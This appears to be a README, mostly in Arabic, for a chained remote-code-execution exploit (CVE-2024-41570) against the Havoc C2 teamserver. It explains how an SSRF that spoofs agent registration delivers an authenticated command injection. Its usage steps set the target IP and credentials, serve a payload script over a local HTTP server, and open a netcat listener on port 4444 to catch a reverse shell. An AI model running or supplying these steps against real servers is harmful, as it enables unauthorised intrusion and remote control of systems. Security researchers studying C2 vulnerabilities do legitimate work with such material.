
هذا استغلال RCE متسلسل في إطار عمل Havoc C2 باستخدام أدوات إثبات المفهوم (PoCs) من github.com/chebuya وgithub.com/IncludeSecurity
هذا هو استغلال RCE متسلسل (CVE-2024-41570) في إطار عمل Havoc C2.
حقن الأوامر: Havoc معرض لحقن الأوامر مما يتيح لمستخدم موثّق تنفيذ أوامر على Teamserver. يؤثر على الإصدارات من 0.3 حتى أحدث إصدار 0.6. يحتوي ملف الإعداد الافتراضي في Havoc على كلمات مرور مضمّنة، لذلك يمكن لمشغّل C2 غير حريص يستخدم الملف الافتراضي على شبكة عامة أن يتم استغلاله فورًا.
SSRF: يتم استغلال هذه الثغرة عبر انتحال تسجيل وكيل Demon وفحوصاته لفتح مقبس TCP على الـ Teamserver وقراءة/كتابة البيانات منه. هذا يسمح للمهاجمين بتسريب عناوين IP الأصلية للخوادم Teamserver والمزيد.
السلسلة: إساءة استخدام SSRF لتوصيل حمولة حقن أوامر موثّقة.

1. Modify the IP, USER and PASSWORD in the exploit.py file.
2. Modify IP in payload.sh
-> python3 -m venv myenv && source myenv/bin/activate
-> pip3 install -r requirements.txt
-> chmox +x payload.sh
-> python3 -m http.server (On another terminal)
-> nc -lvnp 4444 (On another terminal)
# Run the exploit
(myenv) -> python3 exploit.py -t https://site.com -i 0.0.0.0 -p 12345
الفضل يعود إلى @chebuya و @Hyperreality